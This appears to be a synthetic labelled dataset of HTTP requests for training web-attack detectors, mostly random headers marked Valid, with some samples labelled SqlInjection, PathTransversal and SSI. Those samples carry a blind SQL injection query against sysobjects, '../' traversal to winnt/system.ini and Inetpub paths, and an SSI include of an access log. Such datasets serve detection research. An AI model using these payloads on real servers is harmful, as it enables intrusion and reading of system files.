Host: www.aiTeowyuE.biz
Connection: sohlbt
Accept: */*
Accept-Charset: x-mac-turkish;q=0.1, isiri-3342;q=0.6
Accept-Encoding: 
Accept-Language: 7m0-arokSW;q=0.0
Cache-Control: max-age=17
Client-ip: 250.248.98.251
Cookie: btm7ba=5132100207;1b8GDQjncvbscriptfY=vbscriptiut2traOexabqmeta;Eaywa8=791268339;Rsa4bdr=8qoas;nrtef=pohs
Cookie2: $Version="671"
Date: Tue, 12 Sep 06 13:00:52 CET
ETag: W/"kBd2fQueYc25Znl@V"
Expect: sK3n=wyein
From: apCylsgf@aiOdeitn.it
If-Modified-Since: Fri, 30 Jun 06 24:58:10 UTC
If-Unmodified-Since: Sun, 20 Jul 08 12:02:32 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Feb 08 04:18:31 CET
Max-Forwards: 10
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: NTLM cm4wZGF5c2RuYnNha2lUb3NzZXQ0Ym9tYWV6aGVha3JhcWV5YmdkeGV3
Authorization: NTLM bWVzdTdsb2cwaW91OHVkb2R0bXJhaGVhYXRzSHQwaGh1dFRxdHM2bXNkdXN6cg==
Range: 784942-,615-
Referer: /ngNn/h6hEsNaf.tar
TE: gzip,trailers,gzip;q=0.3
Trailer: Connection
User-Agent: 832i/6.5
UA-CPU: 68000
UA-Disp: 8924,5533,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5013x5767
Via: 4.8 www.njtnnwte.shtml, HTTP/1.5 85.236.217.62
Transfer-Encoding: identity
Upgrade: ulg/9.3, maT0N/4.1, oVahw/1.8
Warning: 086 www.tdkos.css "uisvnesrhn5pye" "Mon, 27 Dec 04 14:53:29 UTC"
X-Forwarded-For: 123.87.48.214
X-Serial-Number: 6453522338858945
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14106
Start - Id: 42581
class: SqlInjection
GET /tNn8/qity/on1401t/dh0lrKsbtTm/uanrzh3iwtw.tiff?l0h49kntoahq=oe1laaformghmwiWt&0I7Rfatdpa=%40sxCe&5wEuL19SXV_r=4mwtelhe5n&seLcr6ocelhOOhs=boA+3hH&etotwtn=59251081&rsrdsjttUaMsnag=9htd9n&NtdsuTeUbawoj3=Mobjectsug&g7=earnqpnc&zobjectUdropTGobjectyphpbody=AND++ascii%28lower%28substring%28%28SELECT+++++TOP++++1+++ktaaE+++++FROM+sysobject++WHERE+++xtype+%3D++%27U%27%29%2C1%2C1%29%29%29+%3E++++111&pgxeN=sytexechm&Osdtfeo=etitofalis%2Fidonull HTTP/1.1
Host: 45.234.65.80:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: identity, deflate, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 8.53.51.76
Cookie: 8yowoeecbsthm=tV9frie;eiebnaaiubdhu=5;stu2saeqaeko=9235
Cookie2: $Version="6"
Date: Sun, 24 Aug 08 07:32:59 UTC
ETag: "HhGZbuy.Xmq6SqA2ziN"
Expect: wshtlUla
From: tmTstilr@oerx.it
If-Modified-Since: Wed, 10 Jun 09 15:04:01 GMT
If-Unmodified-Since: Sun, 01 Jan 06 24:54:21 GMT
If-Match: *
If-None-Match: "hlq23lU3Oh7z.8.ZDu"
If-Range: *
Max-Forwards: 8457
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic Nm9UYWV3c3I6bmUzYQ==
Authorization: Digest realm
Range: -327,463619-533,09-501926
Referer: /a2teedj.txt
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/1.2 (Windows; U; Windows NT 0.1; tb-ti; rv:4.6.3) Gecko/55174523
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 291x0022
Via: HTTP/0.3 www.5hrc.jpg, HTTP/9.8 130.173.125.146, 8.4 www.cwoefurv.tiff
Transfer-Encoding: compress
Upgrade: riol/3.2, lwTs/8.6
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 2472184980501898404
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42581
Start - Id: 6250
class: Valid
POST /bilassveuttouIrrlqi/gnVNoM4/reabaaroSteNsiAei/oLwgsiTmdn/86gQ/mIati7r79Hlnak/u2fboeo1fstire01nn/ZbodyKSvK/hgT8R0h7r/7m9WHx/aDeXr.jpg? HTTP/1.0
Content-Length: 117
Content-Language: dnom,ng,aSsEpn
Content-Encoding: deflate
Content-Location: http://www.eOtHsHat.ch/odanaooe.sh
Content-MD5: b2FpYmZuYWdkemxpc2Vjbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Mar 04 11:50:19 UTC
Last-Modified: Mon, 06 Sep 04 13:47:21 UTC
Host: www.7i6s.com
Connection: close
Accept: audio/*, video/*, image/png
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, compress, deflate;q=0.3, identity;q=0.9
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 144.253.178.134
Cookie: aoinskett=u8mesurDT;otmtrpnee=ievegtyiqtvhMeaee;bttd4xhitfqin=a8ite(te3;ay2n=itsd
Cookie2: $Version="443"
Date: Sat, 04 Sep 04 09:22:59 GMT
ETag: W/"eLPLXAP_VFQKA1MC"
Expect: 100-continue
From: Deit2tin@frt4se8ha.be
If-Modified-Since: Sat, 30 Apr 05 03:16:25 CET
If-Unmodified-Since: Fri, 29 Feb 08 22:50:15 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 07 Oct 09 10:16:52 GMT
Max-Forwards: 8
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest qop=HktC
Authorization: indnle Afer=wtad
Range: 3-853722,-06527
Referer: http://ms1a.org/n5te/etum5i.tar.gz
TE: deflate
Trailer: Proxy-Authorization
User-Agent: iqgeie (eQMNF4; cDfwZDdP)
UA-CPU: MIPS
UA-Disp: 9466,026,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0276x3141
Via: 0.4 6.70.244.14, 1in/6.8 15.68.178.235, HTTP/4.0 www.aroeart.jpeg
Transfer-Encoding: gzip
Upgrade: uiaa/2.8
Warning: 293 89.114.170.104 "cpw6e0" 
X-Forwarded-For: 128.144.152.215
X-Serial-Number: 27219
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

satdeldauyfe=n2sbom&h5rwwtpnegm7hso=0062&hzdibojhcslh=j  s&xmlm|eo>acceptfspslse&ushi=aNj7Z&winntKGTIYn-w=07143

End - Id: 6250
Start - Id: 5353
class: Valid
PUT /alferQtfsiwteotepzc/oZ9Qujg-BeFyxBWksjw/pTXIOvvz/r7egreveaoo7tsUjat/t0.ku/pF@vEyq3K8-x/iedeoetnHErelu5w6/e3Bc1pKNDLF/vD.asmx? HTTP/1.0
Content-Length: 76
Content-Language: ehon
Content-Encoding: identity
Content-Location: /ecne/itgeAla/u8lsn/bjooeure.bin
Content-MD5: NG5vYWZoZUxhZm5pbnRzdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Nov 09 04:00:11 GMT
Last-Modified: Fri, 25 Mar 05 07:27:44 GMT
Host: 110.191.128.124
Connection: pusnntn
Accept: application/rtf;q=0.0
Accept-Charset: hz-gb-2312;q=0.6, iso-8859-9, windows-874, x-mac-chinesetrad;q=0.9, utf-8
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.7
Cache-Control: min-fresh=0
Client-ip: 117.42.44.244
Cookie: r6C=eiacceptihsEp;neE=maaadsRe3o;KlogzbZhYA=tR?n;ar=y_Q;erei56lo=74535223;onmeoouao=oototyihmmn0hs
Cookie2: $Version="080"
Date: Tue, 15 Sep 09 24:20:19 CET
ETag: W/"iREKlovTvO.RPG.OWn"
Expect: 100-continue
From: 91ean@e9cutenhT7.cz
If-Modified-Since: Mon, 10 Oct 05 21:25:33 UTC
If-Unmodified-Since: Thu, 04 Oct 07 15:39:13 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 26 Jan 06 13:25:07 CET
Max-Forwards: 8617
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: masa iaeT0e=sarb3wmi
Authorization: NTLM aWg1aWF1c2VsZXRDb2Rsbm51YTJsZnBzZHNoemlobmR1
Range: 1295-20717,537637-
Referer: /Siela/ntlicr/lHRmeho.php3
TE: trailers,gzip
Trailer: Connection
User-Agent: Mozilla/9.4 (Machintosh; U; PPC 9.0; Uk-ps; rv:8.8.0) Gecko/95185924
UA-CPU: x86
UA-Disp: 904,156,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6579x971
Via: FTP/2.1 www.serA.png:099, Oyte/0.1 20.113.143.0:983, FTP/2.2 www.aaa9epho.jpeg
Transfer-Encoding: identity
Upgrade: rpt/8.3, ivis/7.4, ssi/0.8, hba/8.9, i3W/1.4
Warning: 447 www.AoiT.html "ellptootAlwpn4" "Thu, 03 Mar 05 11:10:59 GMT"
X-Forwarded-For: 195.76.247.208
X-Serial-Number: 0742335633125
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

UryestEt9vashoa=par &gSnrelceA=0&inynWf6Lja=iwtze0hluma5jr&acDfArm=yFbH4oLyn

End - Id: 5353
Start - Id: 6614
class: Valid
PUT /nuhat/gR@Ard8zPAIfKxlB4/8v7FsmTYZt_K-HpWyZ/5esh9tOeEe4l/hoeokoiai/rcZopmvoxF@l_.mdb? HTTP/1.1
Content-Length: 74
Content-Language: aw17,aurtLant
Content-Encoding: gzip
Content-Location: http://t3aahho.gov/stwtnfl/r8eee8.jsp
Content-MD5: b0NscjUxTWVOVXJNbmF5NA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Jan 09 06:21:15 UTC
Last-Modified: Sat, 15 Oct 05 20:02:30 UTC
Host: www.jrtd.uk:0
Connection: close
Accept: */*;q=0.6
Accept-Charset: shift_jis, iso-8859-5, x-mac-hebrew
Accept-Encoding: 
Accept-Language: tDstltuo-Lnle, ne-sfte, ooti-wmOnet;q=0.3, k-aera;q=0.0
Cache-Control: ePg=0lpu
Client-ip: 190.126.190.235
Cookie: irwOi0sie=xJkjWs;iEbn=and ODOcr7anteth;crU0iGyr=yxe9RqkJNxXh;Hfao9Rys2=n'r ;me0orE0ettro=w;nAsrt5iu=inetcatOeRauJ2Y
Cookie2: $Version="695"
Date: Wed, 15 Jun 05 04:24:54 GMT
ETag: W/"@EPAcRqyQ7lDSvSX"
Expect: 100-continue
From: yl1dq7lA@wYd2.cz
If-Modified-Since: Wed, 25 Nov 09 20:29:20 UTC
If-Unmodified-Since: Sun, 22 Mar 09 11:29:15 GMT
If-Match: *
If-None-Match: "w7JOdWSR7nhmMNIOx"
If-Range: Fri, 27 Apr 07 23:14:55 CET
Max-Forwards: 6270
MIME-Version: 9.4
Pragma: ont=iossEmh
Proxy-Authorization: zmtsI sarl0ue=aryfers
Authorization: Basic MXRucnk6OWlhY3JJU20=
Range: 349575-,-01819
Referer: http://6ieDm.it/atkhlavS/hrLE/eAuomtNs.wmn
TE: deflate;q=0.2
Trailer: Warning
User-Agent: a1i2.gv2Qm http://www.duUcnaIu.com
UA-CPU: PowerPC
UA-Disp: 3961,730,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 2928x871
Via: 2.3 4.22.84.233
Transfer-Encoding: identity
Upgrade: fmu/0.4, eel/9.8, ebSrda/0.8, OsurI/5.9, recrv/2.4
Warning: 107 4.57.179.221 "8neA" 
X-Forwarded-For: 101.21.26.57
X-Serial-Number: 43970651738336527001
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I5eeeekCf6ut=2180&rdga07yirrh=556860&xegf=i)n[s7L0nst&c3r=[f&YJn.=4V

End - Id: 6614
Start - Id: 45079
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.1
Host: 253.189.70.74
Connection: pswla
Accept: text/plain
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: s1IrcA3o-dins8r
Cache-Control: min-fresh=045
Client-ip: 246.236.7.206
Cookie: Sand@uBstyle=602505
Cookie2: $Version="785"
Date: Tue, 06 Mar 07 21:42:04 CET
ETag: "0GbJoMCi@JTjqEsBGN"
Expect: hn3ir5=6tmi9da;eeo5ers=cHndst
From: hn2w6xt1@ocg8cedowl.net
If-Modified-Since: Mon, 14 Nov 05 03:21:58 GMT
If-Unmodified-Since: Sun, 09 May 04 18:25:42 GMT
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: *
If-Range: "dE-XGHqUO90YpYkq"
Max-Forwards: 7
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM YWhkb3RzaXBtZWRzbXpkNGVhTndhdHJybm5PZnVvaTZpbklyZXJ3U25p
Authorization: NTLM bnJuemVma25tY3JTcm5abm1lb3RoYXRlbm5pZm9yb25sMkU=
Range: 51016-,-10087
Referer: http://ebie.biz/s5eoqetf/f8E3na/ieimsaef.js
TE: trailers,chunked
Trailer: Range
User-Agent: hhmmjgs (scyvxtm; 5Zdmypy; tHi__cQQ2; eukESPg)
UA-CPU: StrongARM
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 003x764
Via: HTTP/8.1 www.3dnajra.htm
Transfer-Encoding: compress
Upgrade: nadi/5.9, zccv3/4.5, 3E2ei/5.6
Warning: 437 www.epd64fo.jpeg "eNe3tlcu" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 2196102
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45079
Start - Id: 45315
class: PathTransversal
GET /opNnrctdihrhpoueiirh/dleiiiGThoEOc1oxl/3enib2SeaDh.aspx?NstWtTJbtto=2080927&Dih=j1rjd1%40h06Ek&gYa4Ras=a%2Frcrl HTTP/1.0
Host: 112.194.245.2
Connection: keep-alive
Accept: text/plain;q=0.3
Accept-Charset: cp-936;q=0.4
Accept-Encoding: 
Accept-Language: r9af-esshY, 9wtNft-yi4he6, 6fh4yrit-aihOeq1n
Cache-Control: no-cache
Cookie: as=tiw5nana| rsn 2xfsamea;el2hemoeRe0=/../../../Inetpub/iissamples/rata/on/orornsnaon/ital.cgi;tethngiearc=daetla;4psta9jsaliusEi=mlocation|ehcmde/sd6/-w6iu&r;oEnl=tvcXH40lo34F
Cookie2: $Version="015"
Date: Thu, 21 Jan 10 15:34:58 CET
Expect: 100-continue
If-Modified-Since: Mon, 30 Jun 08 04:07:27 UTC
If-Unmodified-Since: Fri, 30 Jun 06 07:58:10 CET
If-Match: "JZRGl5-DL7xSCXbT"
If-None-Match: *
If-Range: "sGqva@JMfanmMh6bX4dU"
Max-Forwards: 37
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic dW5ycFRjMm06d21ubmE=
Authorization: Digest cnonce="otos"
Range: 0-
Referer: /Dgvonp/t6aEnyr6.gif
TE: chunked;q=0.3,gzip;q=0.0
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.4 (Machintosh; U; PPC Mac OS X 3.1; rr-kg; rv:5.9.6) Gecko/70969154
UA-CPU: MIPS
UA-OS: WinNT
UA-Color: color8
Via: sohrl/2.0 www.hIsrocLu.css, 3.3 241.227.88.209
Transfer-Encoding: deflate
Warning: 862 138.235.187.151 "taonetlreetepa7" "Fri, 19 Nov 04 03:03:30 CET"
X-Forwarded-For: 74.25.201.88
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45315
Start - Id: 6317
class: Valid
PUT /tBea50dwe.msf? HTTP/1.1
Content-Length: 151
Content-Language: tuzaz,x
Content-Encoding: compress
Content-Location: /dheissg/lywos/rac48x.tiff
Content-MD5: amhjaHRmaWp2dTgyZjlhNw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Sep 09 15:39:06 GMT
Last-Modified: Sat, 03 Jan 09 13:12:20 GMT
Host: 6.187.148.112
Connection: keep-alive
Accept: application/x-tar;q=0.8, application/rtf
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 71.174.220.192
Cookie: ticfJIu=cdK;HsVeim=254013
Cookie2: $Version="988"
Date: Sun, 06 Feb 05 04:47:09 UTC
ETag: W/"y7vQYUVkegGvS08z"
Expect: miFr=fodlt;zoreEsSl
From: ai8tEt@dHaaiz4iys.net
If-Modified-Since: Tue, 23 Dec 08 17:42:13 CET
If-Unmodified-Since: Sat, 22 Sep 07 11:31:19 GMT
If-Match: "@SaWYJEKVcPVOpFO"
If-None-Match: "3P0U9-hEfl20M0c.FO"
If-Range: Mon, 28 Jun 04 16:19:16 UTC
Max-Forwards: 1
MIME-Version: 0.0
Pragma: tdhs=9olc
Proxy-Authorization: yiIr IiWelvS=hslc
Authorization: 6Pizas ootTdnN=dteto
Range: 137601-
Referer: /eiqI/Sel2/9aooalz/dg21rfar/uokisaai.nsf
TE: deflate;q=0.8,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.9 (Windows; U; WinNT 7.9; Dd-td; rv:6.4.5) Gecko/26151096
UA-CPU: 68000
UA-Disp: 2381,870,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 679x627
Via: 3.1 72.151.51.230, 9.6 245.143.143.85:39
Transfer-Encoding: gzip
Upgrade: 7nda/8.0
Warning: 623 137.176.166.196 "nmTcivtnt2saa2c" 
X-Forwarded-For: 161.237.188.1
X-Serial-Number: 9387717978
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

adh=o-nQAmqBw3A5&oVacceptUq@psQusrlbody=/er%gi&i2r=tl-UGP7hs&e7oSstndl=m6otIhoZC&itAe=cmdSato&sllwamlalde77eH=cmdlocationef&6iwe5=t %n&o5n3q=rNae

End - Id: 6317
Start - Id: 39683
class: SSI
GET /AofmmrnsdoHDopeScoai/OtmpeGQNxB.shtml?Llg=dt6esncw%25&xuYkQinput=0338955&gB3W=noinZ&as=%3C%21--+%23include+++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++++--%3E&aa3s4sc=eWi2Tzc%40Q&.4--IxJp=ol&insert6okk=rid9N&mC6=ejZTq%40NxO HTTP/1.1
Host: www.rSnqook.be
Connection: ndiihrl
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: iyt-aiyi
Cache-Control: only-if-cached
Client-ip: 145.187.69.140
Cookie: DS_K4yWxmlt=824;h8fe=t]i
Cookie2: $Version="5"
Date: Fri, 09 Dec 05 16:09:48 CET
ETag: "MnC6RG5yCfdECDak"
Expect: 100-continue
From: g1nes2@zh66rlare.org
If-Modified-Since: Thu, 07 Aug 08 19:56:17 UTC
If-Unmodified-Since: Wed, 14 Jul 04 02:34:49 CET
If-Match: "ZtnT-heb@3T5B_plp"
If-None-Match: "tfE-Bj7GvTdbVvRkYZrr"
If-Range: Fri, 25 Sep 09 21:58:38 GMT
Max-Forwards: 743
MIME-Version: 9.9
Pragma: iv=yienah
Proxy-Authorization: Digest nonce
Authorization: prysso qm3ey=eoeaDme
Range: 1-2703
Referer: /hnRsisu/romte/vbtY1/sns5ps.mdb
TE: trailers,gzip;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/9.8 (Machintosh; U; Mac OS X 5.0; tS-uo; rv:5.5.3) Gecko/37915764
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: FTP/0.5 www.ttarfotw.png
Transfer-Encoding: deflate
Upgrade: im0/0.0, gln/3.7
Warning: 733 214.19.169.247 "I5ohianit" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 39683
Start - Id: 15401
class: Valid
GET /uidooefeusSis2eaa/IEw9j/ilcOs/2jXfX/DZ.GGin6CrB-L@0O/att2xl6742/vy_/ntaq.tiff?i1elahb=92&ihrttoet=roett&yiEtthSiceThe=5466&aMcet2p3gebooa9=hetejlIytAomaw%7E&fijanf=w4sst HTTP/1.1
Host: 80.250.170.28:80
Connection: ourPrbe
Accept: */*;q=0.3
Accept-Charset: x-mac-ce;q=0.6, isiri-3342
Accept-Encoding: deflate;q=0.0, identity;q=0.0, gzip;q=0.2, identity
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 53.1.52.146
Cookie: BFKjo=0>s;hogiu=u;rmetamorP3B=eHwrVgMWa;ee=xnarxterm0ee045iconnecteu2;vtH=71;rsw=r
Cookie2: $Version="129"
Date: Mon, 30 May 05 14:07:04 UTC
ETag: W/"F4a.zqzD89KffrK4sljN"
Expect: ozt4Xtd=soaatlet
From: geinl@l3cifnrd43.fr
If-Modified-Since: Sun, 31 May 09 17:03:57 CET
If-Unmodified-Since: Tue, 20 Jan 04 14:46:18 UTC
If-Match: "yT@8208-0k9bFFh"
If-None-Match: *
If-Range: "vlT5X0Q7d5Ie1@oHJn"
Max-Forwards: 547
MIME-Version: 0.6
Pragma: a7L=0si
Proxy-Authorization: eeaeg nrstl=TnFalO8t
Authorization: l2laeo gdse9oe=rtdldo
Range: 713412-,-311,02-0
Referer: /5taus1/oardrntb.cgi
TE: trailers,trailers
Trailer: Connection
User-Agent: YnsoEfon (rRms7A; oOXVC_RQ2; s1LwfXMW; z92Ztn@; an8bujX.)
UA-CPU: x86
UA-Disp: 8387,983,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5103x7782
Via: HTTP/0.8 109.216.164.214, 7.9 75.84.207.112, pfatb/4.6 73.62.125.41
Transfer-Encoding: hjujn; hEuns=eiel
Upgrade: iiK/5.9, ttnsr2/9.6, i1t/1.1
Warning: 832 www.elmhq.gif "hNotnsoel4" "Wed, 29 Jun 05 13:21:52 UTC"
X-Forwarded-For: 76.40.16.131
X-Serial-Number: 7835814731
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15401
Start - Id: 14822
class: Valid
GET /lfoR@da-JBJe/hBm9PGqAB/n3iKUtlnndMbahtmens/hep7ngtonoomtsy/S4/roos3nw/i3MpVw2J_M9e/ro.swf?29ffad1tIiIh=sHOK20JoCz&yjrz2=izn_&tZwnn3e0hoqT=pcncopy&styleformy5m=8e%25+%3Ftelnetmh0d7htela&eBh=e&h4rlr=egk&jinn5oa=%7Cq&rftroceks=9&Esheeo=uicH8hisr78ruos&jcKXxo_3dd4=9678120 HTTP/1.1
Host: www.mtyfieen.gov
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-stale=6493
Client-ip: 237.183.88.12
Cookie: iwoiae8o=dsO8nc/mf3GY;.M_DZ.IAWT=167205
Cookie2: $Version="50"
Date: Mon, 28 Aug 06 15:48:50 GMT
ETag: W/"Qt6__j8ZaLy@bPXJiWRa"
Expect: 100-continue
From: nOeesl@pemet.it
If-Modified-Since: Tue, 09 Mar 10 09:39:09 GMT
If-Unmodified-Since: Wed, 14 Apr 04 12:20:08 CET
If-Match: *
If-None-Match: *
If-Range: ".jMEGjbQlXholOpa-Og"
Max-Forwards: 08
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: niosi tjsll=y4sneodh
Authorization: Digest cnonce="nbil"
Range: 43-,13433-8
Referer: http://ath6yn.be/1nrrr.aspx
TE: deflate
Trailer: Date
User-Agent: Mozilla/5.4 (Machintosh; U; PPC 1.7; mi-e6; rv:4.9.7) Gecko/29164954
UA-CPU: 68000
UA-Disp: 1041,483,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 923x8805
Via: 8.2 45.41.121.181, aen5D/1.0 www.t9Lns2.jpg, 2.3 1.61.41.125:94
Transfer-Encoding: gzip
Upgrade: altl/2.2
Warning: 387 165.171.90.131 "hiaiten8hm8" 
X-Forwarded-For: 220.203.31.112
X-Serial-Number: 89813
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14822
Start - Id: 1703
class: Valid
GET /PH/eVcBtwvGcp/NBTeJ8XqvFetc5MEE/De/aB0bnhyeirrcndeYAsa.png?dhihhn1ftaro=rXY_Y-td&ve=MsSta&inputz1I5HM9=igdlo&o7ixl9e9o=cautoexec7ibtes&Ldocumentfg=azF&n6c=6262704&whmbdwonjc=72513&gerrein27=7409605&driivs=e%5Cmaltelnet-7+0thtrh%3DPinputo5&MKFz@o6zLMl=9nhu%3Byos%3E+joechoB&POu3zbid=8&1ew1ts=w+yD4we&stT=4826843690&00e96eotanln=8wI&opeqKjnlbst=opt%28 HTTP/1.1
Host: www.69pz.de
Connection: close
Accept: */*
Accept-Charset: windows-1251, isiri-3342, ks_c_5601-1987, cp-936
Accept-Encoding: deflate;q=0.0, gzip
Accept-Language: *
Cache-Control: min-fresh=458
Client-ip: 125.202.6.4
Cookie: divmeta1VWRD7=ie ne;clLI-q4-hl=328015;rwlcmsLdrwz=14;E5TphMxautoexecO=window.openc;rOmedyc9y8pn0=winnthHtm6group bymmt|;7
Cookie2: $Version="8"
Date: Sun, 10 Jan 10 15:14:31 CET
ETag: W/"M0gtL0q8FDD.g3H"
Expect: shtn
From: arsesfWq@lnrrmrt.com
If-Modified-Since: Sat, 14 Feb 09 14:25:21 CET
If-Unmodified-Since: Wed, 30 Jul 08 15:27:28 GMT
If-Match: "D0shhJB@JgVFYqMPoN39"
If-None-Match: *
If-Range: "JCofTTam8effiFmWjbR"
Max-Forwards: 4
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest nonce
Range: 73-
Referer: /txroyy/asma.ace
TE: trailers,trailers,gzip
Trailer: Accept
User-Agent: 6beicitnon (e@LRvled; a0hVxG_7jb; 63HEva-@; o4u0-H2hat)
UA-CPU: StrongARM
UA-Disp: 6638,4343,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3865x207
Via: 9.7 17.52.171.82, 8.6 www.cihet0.tiff, stsee5/9.8 184.20.237.12
Transfer-Encoding: 0sueRp; eaaie=etsnata
Upgrade: eba/9.5, rtti/0.6, Saos/3.8
Warning: 425 www.piy5p.jpg "97tbtycyai6p" 
X-Forwarded-For: 53.157.224.180
X-Serial-Number: 3355979393710804862
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1703
Start - Id: 34600
class: Valid
PUT /asPbYJq/ogrHHw9pEWo/2rS5u/zM_j2./1ohfipndtx8a/X_TWUK/X77Be/eIidS@X2W-z6xaJa4xY.html? HTTP/1.0
Content-Length: 82
Content-Language: ts,xnghanx
Content-Encoding: gzip
Content-Location: /rofhEcb/6sqL/tsykeeim/rhs3htda/r36aeoe.cgi
Content-MD5: YWVyRW9saTVhaGFuNDFydA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Sep 06 15:08:40 GMT
Last-Modified: Fri, 12 May 06 12:25:06 GMT
Host: 123.64.231.241
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.2, deflate;q=0.1, gzip;q=0.7, compress;q=0.8, gzip
Accept-Language: *;q=0.7
Cache-Control: max-age=99231
Client-ip: 60.53.181.132
Cookie: 0ne4=966
Cookie2: $Version="658"
Date: Wed, 12 Nov 08 16:23:28 CET
ETag: W/"vPwpXccS6LBbiMltIVZB"
Expect: esccraO6=rlwoOyee;kiigloo=603t
From: 9rrsW@dinSeD2.ch
If-Modified-Since: Mon, 15 Jan 07 16:17:46 UTC
If-Unmodified-Since: Tue, 22 Aug 06 07:09:53 CET
If-Match: "fM8Q_EPX@jKAPOQ5QMd"
If-None-Match: "Ix6a0Xdrfl82Q-C@O"
If-Range: *
Max-Forwards: 59
MIME-Version: 4.8
Pragma: uoniws=ED
Proxy-Authorization: amH2c rnecro=ka4eNao
Authorization: NTLM Z25yYWhvMHJoRWZlVG9vZWFzZ0k4b2lBc2h0Ykxubmlu
Range: -64
Referer: http://www.E2mr.net/etecrssm/nhniphTr/meETAf/ddieo.jpeg
TE: gzip;q=0.1
Trailer: Accept
User-Agent: icet/5.3.2.1
UA-CPU: PowerPC
UA-Disp: 769,2419,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6005x647
Via: ris/6.5 www.tefuc.htm:94, 9.1 205.190.141.150, en6Phi/1.7 www.h6Rhhyes.jpeg
Transfer-Encoding: compress
Upgrade: etesoc/8.5, ran/3.2, ebnani/4.3, mea/0.1
Warning: 945 www.eeodke.htm "hasrmstcsdtwtkpyg" "Tue, 18 Dec 07 06:07:29 UTC"
X-Forwarded-For: 24.202.233.40
X-Serial-Number: 1977553705
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

syniAnaeoeqi=uIJjaD6HRHC&hSteee=638881285&eeryhebeoit=loC96oudIl&dk68meNeerdd=lump

End - Id: 34600
Start - Id: 24725
class: Valid
GET /GZ7YdeletetmptME/lbuqrwaHkiO_N0_OJ/rqxs.v7EsKk5h6BM@o.html? HTTP/1.0
Host: www.xnlo.fr
Connection: d8ehk9tm
Accept: text/xml, application/*
Accept-Charset: *
Accept-Encoding: 
